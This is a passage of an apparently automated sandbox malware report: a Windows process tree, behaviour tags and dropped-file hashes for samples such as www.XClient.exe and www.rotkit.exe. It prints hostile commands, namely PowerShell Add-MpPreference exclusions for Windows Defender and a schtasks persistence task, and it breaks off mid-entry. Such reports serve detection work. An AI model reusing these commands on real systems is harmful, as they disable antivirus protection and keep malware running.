                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:592
                                                                                                                                  • C:\Windows\Explorer.exe
                                                                                                                                    "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                                                    6⤵
                                                                                                                                      PID:5080
                                                                                                                                    • C:\Users\Public\dControl.exe
                                                                                                                                      "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4848
                                                                                                                              • C:\Users\Public\www.rotkit.exe
                                                                                                                                "C:\Users\Public\www.rotkit.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:740
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\KktXMQ.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\KktXMQ.exe
                                                                                                                                  4⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:5060
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ba25650.bat" "
                                                                                                                                    5⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:2368
                                                                                                                              • C:\Users\Public\www.XClient.exe
                                                                                                                                "C:\Users\Public\www.XClient.exe"
                                                                                                                                3⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Drops startup file
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Adds Run key to start application
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:3936
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\www.XClient.exe'
                                                                                                                                  4⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:2096
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    5⤵
                                                                                                                                      PID:4196
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.XClient.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4344
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      5⤵
                                                                                                                                        PID:2576
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\www.XClient.exe'
                                                                                                                                      4⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:1832
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        5⤵
                                                                                                                                          PID:3228
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "www.XClient" /tr "C:\Users\Public\www.XClient.exe"
                                                                                                                                        4⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2568
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          5⤵
                                                                                                                                            PID:3752
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:3676
                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                      1⤵
                                                                                                                                        PID:3844
                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:4000
                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:4188
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                            1⤵
                                                                                                                                              PID:4636
                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                              1⤵
                                                                                                                                                PID:5084
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                1⤵
                                                                                                                                                  PID:528
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                  1⤵
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  PID:2384
                                                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                  1⤵
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  PID:3520
                                                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:684
                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4780
                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2660
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                        1⤵
                                                                                                                                                          PID:968
                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                            PID:844
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                            1⤵
                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                            PID:2404
                                                                                                                                                          • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                            C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:3424
                                                                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                              • Writes to the Master Boot Record (MBR)
                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                              PID:2888
                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5072
                                                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2312
                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:556
                                                                                                                                                                  • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                                    C:\Windows\System32\WaaSMedicAgent.exe f8a62276c72d688d761415af97fa9ae4 31s49A6LFk287LekuUJ4Yw.0.1.0.0.0
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Sets service image path in registry
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    PID:1964
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2952
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:2216
                                                                                                                                                                    • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:4956
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:2388
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      PID:2656
                                                                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      PID:1608
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:4556
                                                                                                                                                                    • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:4660
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:4712
                                                                                                                                                                    • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:1840
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:1560
                                                                                                                                                                    • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:3668
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:4652
                                                                                                                                                                    • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:4436
                                                                                                                                                                    • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                      C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2620
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:100
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:4796
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:4416
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:4108
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:316
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:2880
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:1588
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:4652
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:4216
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:1408
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:816
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:5080
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:4312
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:2884
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:4892
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:2312
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:700
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:2740
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:3104
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:1712
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:1812
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:3540
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:3252
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:3116
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:4876
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:4816
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:1220
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:2416
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:4376
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:456
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:2476
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:4816
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:4992
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:5052
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:1636
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:3348
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:4712
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:4640

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        968cb9309758126772781b83adb8a28f

                                                                                                                                                                        SHA1

                                                                                                                                                                        8da30e71accf186b2ba11da1797cf67f8f78b47c

                                                                                                                                                                        SHA256

                                                                                                                                                                        92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                                                                                                                                                        SHA512

                                                                                                                                                                        4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        18KB

                                                                                                                                                                        MD5

                                                                                                                                                                        b2c48139d73e114f0dd8a51776f53da7

                                                                                                                                                                        SHA1

                                                                                                                                                                        31fe5302b333385cc7fd6c6782ee47e004eab8c5

                                                                                                                                                                        SHA256

                                                                                                                                                                        5bcc624bbe68ea59a7beffaea3b36b29555ba9f87069ef1b501cb878cb996db3

                                                                                                                                                                        SHA512

                                                                                                                                                                        e87d5bbbd399145886da9e4b81a6d7b9fb70fce7601175847e6529c9826e9d1afa53cda7de60a64efd075c3eadb9b5cdb29ecf7eb30a842b71a142e0edda8446

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        18KB

                                                                                                                                                                        MD5

                                                                                                                                                                        bf36977cbd2e9e0f18794bc75f3183cc

                                                                                                                                                                        SHA1

                                                                                                                                                                        35c482ed129167adfa14d96fd255eee2dca3a1b0

                                                                                                                                                                        SHA256

                                                                                                                                                                        8fdcc3582b69c9d3de4f71191425d749192d0e3305153d35ba6ef856bc372c78

                                                                                                                                                                        SHA512

                                                                                                                                                                        acaa725aa6aeeb46fe4cecc06e27e473da23a0d0f6a2ee28429f9b53ab7eb4b7ddfb66b2290a2c1de682bc18eb9aa8ab168bd17cdec7008e61ae205380597103

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4z6h5b6a.tmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        37KB

                                                                                                                                                                        MD5

                                                                                                                                                                        1f8c95b97229e09286b8a531f690c661

                                                                                                                                                                        SHA1

                                                                                                                                                                        b15b21c4912267b41861fb351f192849cca68a12

                                                                                                                                                                        SHA256

                                                                                                                                                                        557a903f0f2177e3e62b1a534dee554cf2eff3dd3991bc2310f064bf9c7d2152

                                                                                                                                                                        SHA512

                                                                                                                                                                        0f0e5b85b6ef73ecebcd70ca90ce54c019eec1ea99966c469f357dd3393d0067f591b3690fe0b7922d7ba4aa25ebefd76a092d28c3377e6035720f8630a1a186

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ba25650.bat

                                                                                                                                                                        Filesize

                                                                                                                                                                        187B

                                                                                                                                                                        MD5

                                                                                                                                                                        f8d64934fab2165f0eb824278bc7239a

                                                                                                                                                                        SHA1

                                                                                                                                                                        d0a3ddd6975baa13b802a4a3b51af1d45d179bd4

                                                                                                                                                                        SHA256

                                                                                                                                                                        4d28ae6cff6430dd27a83843b63ed763ac4e4c5e932979df7faa69077d31792b

                                                                                                                                                                        SHA512

                                                                                                                                                                        2dd9ab731a4141847e1921e6e36f6c97d6091265e80a71806151ca16646589a3187c6a7245696f75ce564ac21c1f78a325ddfe976a0baa38e7e491a89a9b07a2

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\KktXMQ.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        15KB

                                                                                                                                                                        MD5

                                                                                                                                                                        56b2c3810dba2e939a8bb9fa36d3cf96

                                                                                                                                                                        SHA1

                                                                                                                                                                        99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

                                                                                                                                                                        SHA256

                                                                                                                                                                        4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

                                                                                                                                                                        SHA512

                                                                                                                                                                        27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

                                                                                                                                                                      • C:\Users\Public\dControl.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        447KB

                                                                                                                                                                        MD5

                                                                                                                                                                        58008524a6473bdf86c1040a9a9e39c3

                                                                                                                                                                        SHA1

                                                                                                                                                                        cb704d2e8df80fd3500a5b817966dc262d80ddb8

                                                                                                                                                                        SHA256

                                                                                                                                                                        1ef6c1a4dfdc39b63bfe650ca81ab89510de6c0d3d7c608ac5be80033e559326

                                                                                                                                                                        SHA512

                                                                                                                                                                        8cf492584303523bf6cdfeb6b1b779ee44471c91e759ce32fd4849547b6245d4ed86af5b38d1c6979729a77f312ba91c48207a332ae1589a6e25de67ffb96c31

                                                                                                                                                                      • C:\Users\Public\dControl.ini

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

